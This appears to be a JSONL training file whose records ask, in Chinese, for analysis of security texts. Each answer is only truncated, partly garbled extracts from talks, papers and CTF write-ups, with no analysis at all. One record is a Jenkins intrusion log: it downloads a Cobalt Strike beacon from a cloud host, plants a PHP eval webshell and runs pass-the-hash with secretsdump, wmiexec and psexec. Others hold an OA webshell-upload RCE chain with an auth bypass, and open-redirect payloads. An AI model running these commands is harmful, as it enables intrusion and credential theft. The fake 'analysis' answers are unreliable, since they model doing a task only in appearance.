{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTruman Kain TEVORA Dragnet Your Social Engineering Sidekick TL;DR Your social engineering conversions will increase with Dragnet. Current States of: OSINT Analytics S.E. Engagements OSINT Manual Repetitive Fleeting when automated Analytics Big companies live off of it Jeff Bezos, 1997 3 years ago I was working at a quantitative hedge fund when I came across a startling statistic Analytics Youre ignoring it S.E. Engagements Choose Two One. Effective Quick Inexpensive Dragnet OSINT Automation Machine Learning Open-Source Dragnet OSINT 1. Import Targets 2. Keep your hands near the wheel Dragnet Automation OSINT Gathering* Infrastructure Deployment Campaign Execution Data Correlation Dragnet ML Tag your templates Import prior conversion data Dragnet ML and say your prayers. DEMO Whats Next? Ringless Voicemail Drops Individual Targeting Distributed Vishing Native Mobile?! [Your Request Here] Truman Kain TEVORA Dragnet Your Social Engineering Sidekick Thank you! threat.tevora.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMOSE: Using Configuration Management for Evil Presented By: Jayson Grace Legal Stuff I am not speaking on behalf of my employer (or any previous employers), nor am I here as a representative of my current or previous employers. My opinions do not reflect those of my current or previous employer, and are solely my own. 2 $ whoami  Death Metal Vocalist  Former DevOps engineer and Sysadmin  Penetration Tester at Splunk  Automator of things 3 Agenda  What are Configuration Management Tools?  How can we use them for evil?  What is MOSE, why do we need it, and how do we run it?  Demos  Future Plans 4 Poll Who enjoys post exploitation? 5 Poll Pt. 2 Who feels like they have enough time to do it properly? 6 Story Time  Automation is best way to optimize post exploitation efforts  MOSE will level up your postex game when you compromise CM servers 7 What are Configuration Management Tools?  Tools to provision systems  Helpful for managing assets in networked environments 8 CM tools share many common features  Idempotency  Ensure consistency across deployments  Scalable  Guaranteed state  Modular, repeatable, supports variety of OSs  Native Secrets Management Solution  Client/Server or Standalone deployment 9 These tools are used a lot of places 10 Some of the more popular options 11 These tools do have key differences 12 Puppet Chef Salt Ansible Language Used Proprietary DSL Ruby-based Proprietary DSL YAML YAML Architecture Master / Agent Master / Agent / Workstation Master / Minion Agentless Packaging Manifests & Modules Recipes & Cookbooks States & Formulas Roles & Playbooks Secrets Hiera-eyaml Chef Vault Encrypted Pillar Ansible Vault CMs Pro: no more bash scripts from hell 13 14 Demo 1 But what about Kubernetes/containers?  Yep, great technology, super useful  However, have limitations:  Not everything can be cloud-based  Difficult to migrate older monoliths to containers  Need tools to manage Kubernetes deployments  So CM tools arent going anywhere 15 CM for evil 16 CM to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFranz Payer Tactical Network Solutions http://cyberexplo.it Acknowledgements  Zachary Cutlip  Craig Heffner  Tactical Network Solutions What Im going to talk about  Music streaming basics  Security investigation process  Music player mimicking  Exploit demo  Man-in-the-middle interception  Questions What is streaming?  A way to constantly receive and present data while it is being delivered by a provider  Wikipedia  2 methods  Custom protocol  HTTP Wheres the vulnerability?  Music files can be retrieved by mimicking the client player  Web traffic is easily intercepted  Can be done entirely from the browser Process  Locate music file in network traffic  Inspect any parameters in the request  Locate origin of those parameters  Page URL  Page source  JavaScript  Attempt to replicate the request Target: Aimini  Flash  Almost nonexistent security  Good first target  Dont even need to look at the code Analyzing the target The cheap way out The cheap way out Analyzing the target: song file Analyzing the target: song file Demo Time Target: Grooveshark  HTML5  Several factors of authentication  Minified JavaScript  Not for the faint of heart JavaScript beautifier  Youre going to need it  http://jsbeautifier.org/ Analyzing the target: song file Analyzing the target: more.php Analyzing the target: more.php So now what?  We need:  streamKey  How do we get it?  more.php - getStreamKeyFromSongIDEx  Session - ?  Token - ?  UUID - ?  songID - ?  more.php - getCommunicationToken Looking for variables  app.min.js Recap  We need:  streamKey  How do we get it?  more.php - getStreamKeyFromSongIDEx  Session  window.GS.config  Token - ?  UUID - ?  songID - window.GS.models.queue.models  more.php - getCommunicationToken Looking for variables  app.min.js Recap  We need:  streamKey  How do we get it?  more.php - getStreamKeyFromSongIDEx  Session  window.GS.config  Token - ?  UUID  copied function from app.min.js  songID - window.GS.models.queue.models  more.php - getCommunicationToken Lookin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJenkins PCIWriteUP println'\"bitsadmin'/rawreturn'/transfer'getfile'https://xxxxxx.myqcloud.com/beacon.exe'C:\\ \\\\Windows\\\\Temp\\\\beacon.exe\".execute().text tomcat  4imagesgetshell <?php'$_GET[a]($_GET[b]);?> https://10.10.6.188/search.php?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%2 9,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; shell'net'group'\"Domain'Controllers\"'/domain shell'net'config'workstation  python3'secretsdump.py'-hashes':31d6cfe0d16ae931b73c59d7e0c089c0''polo.shirts.corp/STRIPED $@10.10.4.84' python3'wmiexec.py'polo.shirts.corp/administrator@10.10.4.84'-hashes':a0344e117c4fa1a0b7ce bc63c1e8ed12 python3'psexec.py'-hashes'aad3b435b51404eeaad3b435b51404ee:b983c6d950041cd3fe5984ea272aa9f 4'aaustin@10.10.9.189'-c'/Users/xxxx/Documents/beacon.exe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n推荐序  IV 点击京东购买 点击当当购买 推荐序 近年来在党和国家的高度重视下网络安全行业发展迅猛吸引了大批年轻学子和有志青年 投身其中2015 年网络空间安全正式成为工学门类下的一级学科与此同时不论是在 高校还是企事业单位中CTF 等类型的信息安全竞赛也开始蓬勃发展通过竞赛涌现出了一大批 高手能手但是竞赛中各个模块间的发展程度却参差不齐相对而言WebMisc 等模块发展较 快参与的选手也较多二进制安全相关模块如 Reverse逆向Mobile此处指移动安全等 模块的选手相对就少些而其中的 Pwn 模块则参赛选手最少究其原因主要是因为相对其他模 块二进制安全相关模块的学习曲线更陡峭要求选手对系统的理解更为深入 市面上安全相关的书籍教程汗牛充栋与漏洞主题相关的却屈指可数在这些书籍中由于 作者本身都是从事漏洞发掘工作的所以相关案例多以 Windows 平台下的各种软件漏洞为主其他 平台为辅但 Windows 平台本身内部实现机制就比较复杂相关文档不多且有的软件自身还会有 自己私有的内存管理方法比如微软的 Office 软件在开始学习相关技能之前所需要掌握的相 关前置背景知识就够人喝一壶了 本书另辟蹊径利用历届的 CTF 真题以 x86/x64 平台下 Linux 系统中的 Pwn 样题为例讲述 漏洞利用的基本方法和技巧由于 Linux 系统本身就是一个开源系统相关文档也比较齐全因此 在这个平台上容易把问题讲透把基本功练扎实了再去学习其他平台上的漏洞利用技术必将起 到事半而功倍的效果此外当前被广泛使用的 Android 等操作系统本身就是 Linux 系统的变种相 关技术也很容易移植到这些系统的漏洞发掘利用中去 本书的作者是业内后起之秀书中所用的例子贴近 CTF 实战讲解详尽思路清晰非常有助 于读者理解和学习 本书的审校者吴石老师率领的腾讯 eee 战队曾多次斩获国内外高等级竞赛的大奖相关 经验非常丰富 本书为广大学子和从业人员学习漏洞利用技术知识提供了有益的指导相信有志学习者经过 推荐序  V 认真钻研必能早日登堂入室为我国网络安全事业的发展添砖加瓦 崔孝晨 Python 绝技运用 Python 成为顶级黑客最强 Android 书架构大剖析译者 序  VI 序 时间回到 2017 年 7 月 随着信息安全的发展CTF 竞赛开始引人关注这种有趣的竞赛模式非常有助于技术切磋和快 速学习在西电信安协会XDSEC学长的带领下当时的我已经接触 CTF 赛题有较长时间了由 于当时网上还没有比较完善和系统的资料本着开源精神自利利他的目的我在 GitHub 上创建了 一个称为CTF-All-In-One的项目并给了自己第 1 个 star 此后这个项目日渐完善吸引和帮助了不少初学者到现在已经收获了超过 2100 个 star在 此向所有为技术分享与进步作出贡献的 CTF 出题人和项目贡献者们致敬 收到刘皎老师的约稿邀请是在 2018 年 10 月那时我刚上大四抱着试试看的心情我惊喜 惶恐地接受了这项挑战接下来就是定目录交样章并在 2019 年 1 月签订了约稿合同没想 到的是写作的道路竟如此艰难每一章每一节每一个例子甚至每一个词都要细斟慢酌生怕 误人子弟由于学业和工作上的事情较多最初参与的两个朋友相继离开了我本人也多次想放弃 就在这样反反复复的状态下一直到 2020 年 7 月才完成初稿经过几轮艰苦的校稿终于在 2020 年 10 月签订了出版合同两年时间就这样一晃过去了 现在再回头看本书写作的过程基本就是一个现学现卖的过程我一边学习新知识一边 不断调整内容框架在学习的路上我曾遇到太多的分岔踩过无数坑正因为如此我尽量把自 己的经验写进书里使读者可以快速获得关键技术避免踩坑和重复劳动所以与其称它为一本 书倒不如说这是一座经过校对打磨并最终以书的形式呈现的知识库当然在此过程中我 也发现写作是一种非常有效的训练方式很明显通过梳理知识点和想法我不仅系统掌握了相关 知识也明确了思路对从事相关工作大有裨益 我们将此书命名为CTF 竞赛权威指南Pwn 篇是期待有更多人参与进来拿出 Web 篇 Reverse 篇Crypto 篇等更好的作品让这个系列更配得上权威二字信息安全是一门有趣的学 科我为自己当初的选择高兴也希望阅读本书的你同样为自己的选择而激动作为一本面向初 序  VII 学者的书读者中一定有不少中学生全国中学生网络安全竞赛每年都在我的母校西安电子科技大 学进行迄今已是第三届颇具规模在此欢迎各位小读者报考母校的网络与信息安全学院这里 真的是一个很棒的地方 本书的出版要感谢我的大学室友刘晋他早期的帮助让这个项目得以成形感谢腾讯的吴石 老师他的推荐让本项目顺利成书惠及更多的人感谢吴石老师和腾讯 eee 战队的谢天忆朱梦 凡马会心和刘耕铭四位老师的建议与审", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Apache Airflow Celery 消息中间件命令执行CVE-2020-11981 Apache Airflow是一款开源的分布式任务调度框架在其1.10.10版本及以前如果攻击者控制了Celery的消息中间件如Redis/RabbitMQ将可以通过控制消息在Worker进程中执行任意命令 由于启动的组件比较多可能会有点卡运行此环境可能需要准备2G以上的内存 参考链接 - <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx> - <https://github.com/apache/airflow/pull/9178> ## 漏洞环境 依次执行如下命令启动airflow 1.10.10 ```bash #初始化数据库 docker compose run airflow-init #启动服务 docker compose up -d ``` ## 漏洞利用 利用这个漏洞需要控制消息中间件Vulhub环境中Redis存在未授权访问通过未授权访问攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令参数为命令执行中所需要的数组 我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令`touch /tmp/airflow_celery_success` ```bash pip install redis python exploit_airflow_celery.py [your-ip] ``` 查看结果 ```bash docker compose logs airflow-worker ``` 可以看到如下任务消息 ![](1.png) ```bash docker compose exec airflow-worker ls -l /tmp ``` 可以看到成功创建了文件`airflow_celery_success` ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDemonstration of Hardware Trojans Fouad Kiamilev (Dr. K), Ryan Hoover, Ray Delvecchio, Nicholas Waite, Stephen Janansky, Rodney McGee, Corey Lange, Michael Stamat Who We Are We take pride in our junk drawers. Crazy ideas are encouraged. We can't tell you everything but you can still ask. You simulate it - we build it. Our mess is a sign of work in progress. Our toolbox contains more than just MATLAB. No device is safe from disassembly. We love what we do. What We Do Software Firmware FPGA Systems Special Instruments Reverse Engineering Printed Circuit Boards Discrete Analog Circuits Custom Integrated Circuits Mechanical Design Gigabit Data Links Power Converters Definitions Hardware Trojan: malicious alteration of hardware, that could, under specific conditions, result in functional changes of the system. Time Bomb Trojan disables a system at some future time. Data Exfiltration Trojan leaks confidential information over a secret channel. Reference: Detecting Malicious Inclusions in Secure Hardware: Challenges and Solutions, X. Wang, M. Tehranipoor, and J. Plusquellic, IEEE HOST 2008 Workshop, Anaheim, California, USA Why is it a threat? Electronics plays an important role in: Storage and communication of confidential information Management and control of important equipment Critical national security applications and systems  Because of globalization, chip design and fabrication are increasingly vulnerable to malicious alterations. What can be altered? HDL Source Code Circuit Diagram IC Layout FPGAs  Definition: An FPGA is a semiconductor device containing programmable logic components and programmable interconnects.  To configure (\"program\") an FPGA you specify how you want the chip to work with a logic circuit diagram or a source code using a hardware description language (HDL). Our Demonstration Platform Application AES Encryption engine Hardware Spartan 3E FPGA Board PS2 Keyboard (user input) LCD Display (Cipher output) Trojan Once triggered by a request to encrypt a s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wireshark doo dooo do doo... Category: Forensics, 50 points ## Description > Can you find the flag? A network capture was attached. ## Solution We get a network capture with mainly HTTP traffic: ```console (user@kali)-[/media/sf_CTFs/pico/Wireshark_doo_dooo_do_doo] $ tshark -qz io,phs -r shark1.pcapng =================================================================== Protocol Hierarchy Statistics Filter: eth frames:987 bytes:1524814 ip frames:985 bytes:1524716 tcp frames:985 bytes:1524716 http frames:288 bytes:1158734 tcp.segments frames:142 bytes:1078777 mime_multipart frames:142 bytes:78526 tcp.segments frames:142 bytes:78526 data-text-lines frames:2 bytes:695 tls frames:43 bytes:75441 tcp.segments frames:2 bytes:6576 arp frames:2 bytes:98 =================================================================== ``` Scanning through the streams, we see this at stream #5: ```console (user@kali)-[/media/sf_CTFs/pico/Wireshark_doo_dooo_do_doo] $ tshark -r shark1.pcapng -qz follow,tcp,ascii,5 =================================================================== Follow: tcp,ascii Filter: tcp.stream eq 5 Node 0: 192.168.38.104:64093 Node 1: 18.222.37.134:80 447 GET / HTTP/1.1 Host: 18.222.37.134 Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 330 HTTP/1.1 200 OK Date: Mon, 10 Aug 2020 01:51:45 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 07 Aug 2020 00:45:02 GMT ETag: \"2f-5ac3eea4fcf01\" Accept-Ranges: bytes Content-Length: 47 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Gur synt vf cvpbPGS{c33xno00_1_f33_h_qrnqorrs} =================================================================== ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n漫 谈 A O S P 蓝 牙 漏 洞 挖 掘 技 术 韩子诺 OPPO安珀实验室 关于我  韩子诺ele7enxxhOPPO安珀实验室高级安全专家主要研究领域为Android安全IoT 安全和车联网安全在二进制漏洞挖掘与利用方面拥有6年以上相关经验  曾在RuxconZer0Con和Pacsec等多个国际知名会议进行技术演讲  截至目前累计独立获得Android数百个CVE编号Google Bug Hunters排行榜第8 Hackerone高通致谢榜2022年度第1  联系我ele7enxxhweibo | weixin | github 议程  背景  Android蓝牙协议栈发展历史  历史漏洞分析  攻击面  挖掘方法  源码审计和模糊测试  展望  潜在的脆弱点  更高效的挖掘思路 背景 Android蓝牙默认协议栈 2.2 - BlueZ  Linux默认协议栈 Android蓝牙默认协议栈 2.2 - BlueZ 4.2 - Bluedroid  由博通和Google共同开发  external/bluetooth/bluedroid Android蓝牙默认协议栈 2.2 - BlueZ 4.2 - Bluedroid 6.0 - Fluoride Android蓝牙默认协议栈 2.2 - BlueZ 4.2 - Bluedroid 6.0 - Fluoride 13 - Gabeldorsche  /system/bt - /packages/modules/Bluetooth/system  新的AVRCP协议实现  重写了BLE扫描BLE广播ACL连接管理控制器信息管 理HCI层HAL接口层等模块  部分模块开始使用rust语言 历史漏洞  BlueBorne - 2017年公开的一组蓝牙HOST层协议内存破坏漏洞影响多个平台和系统造成 了很广的影响引导了众多安全研究者关注蓝牙安全  BadBluetooth - 2019年由香港中文大学Fenghao Xu发表于2019年安全顶会NDSS上的一篇 论文主要介绍了蓝牙配对时的逻辑缺陷导致的绕过风险  BlueFrag - 2020年Android安全公告披露的一个严重漏洞攻击者利用ACL分包处理时的一 个越界写漏洞可以远程代码执行 历史漏洞分析  从2017年1月到2022年10月累计至少披露 148个漏洞其中高危99个严重49个未统 计中危  2018年发现漏洞67个几乎占比近6年总数的 一半主要是受到BlueBorne的影响 历史漏洞分析  漏洞的类型具有较强的时间相关性业务逻辑 错误漏洞 -> 内存破坏漏洞 -> 权限校验不当漏 洞 -> 内存破坏漏洞  漏洞的类型随着代码的健壮性和白帽子的关注 点而变化 历史漏洞分析  由于蓝牙存在天然的远程攻击面因此漏洞级别定级偏高  白帽子在AVRCPSDPL2CAPGATT等模块中发现了大量的漏洞 攻击面 system_server - packages/modules/Bluetooth/service/java/com/android/server/bluetooth com.android.bluetooth APP Remote Host Controler Data Normal APP Binder IPC 权限校验不当业务逻辑错误CVE-2020-27054CVE-2020-0183等 libbluetooth_jni - packages/modules/Bluetooth/android/app/jni libbluetooth - packages/modules/Bluetooth/system Java Service - packages/modules/Bluetooth/android/app/src/com/android/bluetooth Bluetooth Chip BluetoothManagerService Adapter Pbap Gatt Sap HearingAid Headset Map Mcp Opp HidDevice Pan battery AvrcpController AvrcpTarget Tbs BassClient A2dpSink HeadsetClient HidHost A2dp LeAudio MapClient Hap VolumeControl Csip adapter gatt csip a2dp hap hfp hid sdp avrcp vc le_audio pan SDP BNEP L2CAP - (BR/LE) HIDD/HIDH RFCOMM HCI ATT/GATT/EATT ACL AVDT/AVRC/AVCT ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMalicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs Dhia Mahjoub and Thomas Mathew Overview  The goal of this talk is to provide a series of simple statistical methods that allow a researcher to identify ZBot domains using SSL data  All of the data discussed is open source and can be obtained at scans.io/study/sonar.ssl (thanks rapid7!) SSL  Secure Socket Layer  Method of encrypting traffic over HTTP  Increase in websites employing SSL SSL (cont)  Interested in the x509 certificate  Contains information regarding the issuer, subject, creation date, etc  Each certificate associated with IP(s)  x509 contain a CommonName field which can be either blank or contain an alphanumeric string  Our interest is in CommonNames that are valid domain names SSL (Cont)  x509 certificates reveal valuable network information  Maps relationship between domestic vs commercial IP space  Gives information regarding ownership of a particular IP SSL (Cont) CDNs, SSL, Zbot?  CDNs serve as content delivery for popular domains  CDNs help establish similar connections to a domain by hosting identical x509 certificates or x509 certificates with the same common name  In recent times Zbot has attempted to use its network of hacked machines as CDN for malicious actors (hosts carding forums, trojans, etc)  Can we use SSL data to help us identify Zbot? Sonar Data  2x or 4x monthly scan of the entire IPv4 IP space  x509 > IP pairing  Sampled data because of restrictions Sonar Data  Longitudinal study of Sonar SSL data. Examine hosting patterns over a 5 month time period  Hope to identify anomalous behavior Sonar Data  Table documents the number of SHAs and CommonNames per month  Manually infeasible Unique SHAs Unique Common Names JAN 1,068,402 850,236 FEB 692,542 589,609 MARCH 977,484 813,773 APRIL 249,252 233,834 MAY 1,098,914 958,321 Investigation  Data easier to work with if it has a natural structure  What structure naturally captures this type of data? Investigatio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRaw Linguist Analysis and Word Count Output for Big Five and Dark Triad traits Talk Title : Can Twitter help expose psychopath killers traits Presenters: Chris Sumner & Randall Wald Abstract: Recent research has identified links between Psychopaths and the language they use (Hancock et al 2011), with media reports suggesting that such knowledge could be applied to social networks in order help Law Enforcement Agencies expose \"Psychopath killers' traits\". This is the first public study to research Psychopathy in the context of social media. This study explored the extent to which it is possible to determine Psychopathy, and other personality traits based on Twitter usage. This was performed by comparing self-assessment 'Dark Triad' (Psychopathy, Machiavellianism, Narcissism) and 'Big Five' (Openness, Conscientiousness, Extraversion, Agreeableness, Neuroticism) personality traits with the Twitter information, usage and language of 2927 participants. Results show that there are a number of statistically significant correlations between an individual's darker personality traits and their Twitter activity. We also identified links between users' attitudes to privacy, their personality traits and their twitter use. We will present the improvement gains possible through the use of machine learning for personality prediction and share the models and techniques employed. In addition to presenting our results, this talk will provide an introduction into identifying psychopathic traits using the Hare Psychopathy Checklist (PCL-R), present the technical approaches to collecting, storing and analyzing Twitter data using Open Source technologies and discuss the current ethical, privacy and human rights concerns surrounding social media analysis, vetting and labeling. We will conclude with two proof of concept works, the first using the visualization tool Maltego to explore how visual analysis could be used to identify potential troublemakers at events such a far right demonstrati", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n简单写一下审计了几个月这个 oa 的思路 首先肯定还是看 web.xml 对 jsp 文件的鉴权以及 oa 的补丁都在 SecurityFilter 中 E8 和 E9 的主要差别就是 E9 多了一个/api 的访问 也就是这个 servlet 这个 servlet 就是扫描 com.cloudstore 和 com.api 包下的@Path 注解的一个 rest 接口 SecurityFilter 初始化时会调用 weaver.security.filter.SecurityMain 的 initFilterBean 方法会 初始化安全规则 会加载这两个文件夹下对应 Ecology 版本的 XML 规则文件 后面这些代码太多了 就不一一去看 一个重要的点就是会去调用 weaver.security.rules.ruleImp 包下面的每一个类的 validate 方法 这些类差不多就是 E9 每 次打的补丁 我们可以在拿到补丁后直接看到这些洞的 URL 这里有一个小 tips 就是如果是 因为安全规则访问某个点导致的 404 在返回的 header 里会有一个 securityIntercept 泛微在这几个月修复了一系列由于 imagefilemanager 导致的 RCE 漏洞 我们先看到这次某微在 3 月份打的一个补丁 weaver.security.rules.ruleImp.SercurityRuleForCptInventory 这个补丁针对性的修复了我交给某平台的一个前台 RCE 漏洞 并且只是在我交洞的一个月 后 我没拿洞去打 也没给过任何人 所以 懂得都懂 路径是/api/cpt/inventory/docptimpoptinventory 这里拿到 inventoryexcelfile 参数调用 getImageFileInfoById 方法拿到 ImageFileManager 随后调用 getImageFileName 验证了后缀名 我习惯在审计的时候把这些库文件丢到 jd-gui 里面全部反编译出来方便在 idea 里面搜索 在 com.engine.cpt.web.CptInventoryAction 类里 跟进 可以发现这里是拿到 inventoryexcelfile 参数然后查询数据库后将 imagefilename 拼接到了 路径中直接将文件写入到/cpt/ExcelToDB/目录中 所以我们现在需要找到一个前台的地方 进行上传 jsp 木马写入 imagefile 表中并且还要回显 imagefileid 当我把 e9 源码熟悉之后 直 接在所有 jsp 文件中搜索 new FileUpload(request,\"utf-8\") 由此找到了这个文件可以前台访 问 workrelate/plan/util/uploaderOperate.jsp 这个文件可以达到上面的要求 跟进这个方法 关键点在这个 uploadFiles 方法 跟进后就会发现这个类 weaver.file.FileUpload 的所有文件上传操作都会进行压缩之后写入 到 imagefile 数据表中 然后将文件放到 filesystem 目录 并且在文件上传的过程中不会验证 文件的后缀名 作为 imagefilename 字段写入到数据库中 到这里似乎已经可以写入 webshell 了 但是如果此时我们一步步的上传然后去访问会发现 直接 404 了 这是因为有对应的规则 访问/cpt/ExcelToDB/目录中的 jsp 文件必须登陆才能 访问 我们需要的是前台 RCE 所以必须得找一个前台的地方我们可以完全控制写入数据库 中的 imagefilename 参数 使其为/../../xxx.jsp 在 weaver.file.FileUpload 类的上传中 调用 的是某微自己写的文件上传解析类 weaver.file.multipart.MultipartParser 直接取最后一个斜杠后的内容为文件名 通过搜索 new ServletFileUpload 寻找调用 commons-fileupload 库来解析文件上传的地方 最后找到了 /api/fna/documentCompare/doCreateDocument 这个路径 这里可以将文件名原样的写入到 imagefile 表中 返回 imagefileid 具体的就不去跟了 最后还有一个点就是/api 路径的鉴权 我们上面所提到的这两个路径都是需要登陆后访问的 解决办法就是大写 /API/像这样访问就不需要登陆 /api/路由的鉴权在这个类中 335 行 可以看到这里拿到 requesturi 之后并没有转换大小写 导致/API/可以绕过这个鉴权 那为什么大写 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDisclosing Private Information from Metadata, hidden info and lost data Chema Alonso, Enrique Rando, Francisco Oca and Antonio Guzmán Abstract  Documents contain metadata and hidden information that can be used to disclose private data and to fingerprint an organization and its network computers. This document shows what kinds of data can be found, how to extract them and proposes some solutions to the problem stated here. Index Terms  Metadata, fingerprinting, security, privacy   1 INTRODUCTION he collaborative work in on documents justifies the need of an extra information attached to the documents, in order to allow coherent and consistent results. In an environment where social networks make the sharing of resources such an important issue, it is necessary to store information about documents authors, the computers used to edit the documents, software versions, printers where they were printed, and so on. Then, if necessary, it will be possible, to prove the authorship of a concrete piece of information, to undo the last changes, to recover a previous version of a document or even to settle responsibilities when authorities want to investigate, for example, the management of the digital rights. The techniques used to attach this extra information to a document, without interfering with its content, are based on Metadata. The concept of Metadata can be understood as information about the data. But it can also be understood as a structured description, optionally available to the general public, which helps to locate, identify, access and manage objects. Since Metadata are themselves data, it would be possible to define Metadata about Metadata too. This can be very useful, for example, when a given document has been the result of merging two or more previous documents. The most frequent objective of Metadata is the optimization of Internet searches. The additional information provided by Metadata allows to perform more accurate searches and to simplify the develop", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Open URL Redirection > Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Un-validated redirect and forward attacks can also be used to maliciously craft a URL that would pass the applications access control check and then forward the attacker to privileged functions that they would normally not be able to access. ## Summary - [Open URL Redirection](#open-url-redirection) - [Summary](#summary) - [Exploitation](#exploitation) - [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx) - [Fuzzing](#fuzzing) - [Filter Bypass](#filter-bypass) - [Common injection parameters](#common-injection-parameters) - [References](#references) ## Exploitation Lets say theres a `well known` website - https://famous-website.tld/. And let's assume that there's a link like : ```powershell https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account ``` After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL. What happens if we change the `famous-website.tld/account` to `evil-website.tld`? ```powershell https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account ``` By visiting this url, if we get redirected to `evil-website.tld` after the sign-up, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials. ## HTTP Redirection Status Code - 3xx - [300 Multiple Choices](https://httpstatuses.com/300) - [301 Moved Permanently](https://httpstatuses.com/301) - [302 Found](https:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python from flask import Flask, render_template, Response from flask_sockets import Sockets import json import MySQLdb app = Flask(__name__) sockets = Sockets(app) with open(\"config.json\") as f: connect_params = json.load(f) connect_params[\"db\"] = \"ganbatte\" # Use Shift-JIS for everything so it uses less bytes Response.charset = \"shift-jis\" connect_params[\"charset\"] = \"sjis\" questions = [ \"name\", \"quest\", \"favorite color\", ] # List from http://php.net/manual/en/function.mysql-real-escape-string.php MYSQL_SPECIAL_CHARS = [ (\"\\\\\", \"\\\\\\\\\"), (\"\\0\", \"\\\\0\"), (\"\\n\", \"\\\\n\"), (\"\\r\", \"\\\\r\"), (\"'\", \"\\\\'\"), ('\"', '\\\\\"'), (\"\\x1a\", \"\\\\Z\"), ] def mysql_escape(s): for find, replace in MYSQL_SPECIAL_CHARS: s = s.replace(find, replace) return s @sockets.route('/ws') def process_questsions(ws): i = 0 conn = MySQLdb.connect(**connect_params) with conn as cursor: ws.send(json.dumps({\"type\": \"question\", \"topic\": questions[i], \"last\": i == len(questions)-1})) while not ws.closed: message = ws.receive() if not message: continue message = json.loads(message) if message[\"type\"] == \"answer\": question = mysql_escape(questions[i]) answer = mysql_escape(message[\"answer\"]) cursor.execute('INSERT INTO answers (question, answer) VALUES (\"%s\", \"%s\")' % (question, answer)) conn.commit() i += 1 if i < len(questions): ws.send(json.dumps({\"type\": \"question\", \"topic\": questions[i], \"last\": i == len(questions)-1})) elif message[\"type\"] == \"get_answer\": question = mysql_escape(message[\"question\"]) answer = mysql_escape(message[\"answer\"]) cursor.execute('SELECT * FROM answers WHERE question=\"%s\" AND answer=\"%s\"' % (question, answer)) ws.send(json.dumps({\"type\": \"got_answer\", \"row\": cursor.fetchone()})) print message @app.route('/') def hello(): return app.send_static_file(\"index.html\") if __name__ == \"__main__\": from gevent import pywsgi from geventwebsocket.handler import WebSocketHandler addr = ('localhost', 5000) server = pywsgi.WSGIServer(addr, app, handler_class=WebSocketHandler) server.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPISE: Protocol Inference using Symbolic Execution and Automata Learning Ron Marcovich, Orna Grumberg, and Gabi Nakibly Computer Science Department, Technion, Haifa, Israel {ron.mar,orna,gnakibly}@cs.technion.ac.il Abstract. Protocol Inference is the process of gaining information about a protocol from a binary code that implements it. This process is use- ful in cases such as extraction of the command and control protocol of a malware, uncovering security vulnerabilities in a network protocol imple- mentation or verifying conformance to the protocols standard. Protocol inference usually involves time-consuming work to manually reverse en- gineer the binary code. We present a novel method to automatically infer state machine of a net- work protocol and its message formats directly from the binary code. To the best of our knowledge, this is the first method to achieve this solely based on a binary code of a single peer. We do not assume any of the following: access to a remote peer, access to captures of the protocols traffic, and prior knowledge of message formats. The method leverages extensions to symbolic execution and novel modifications to automata learning. We validate the proposed method by inferring real-world proto- cols including the C&C protocol of Gh0st RAT, a well-known malware. Keywords: Protocol Inference  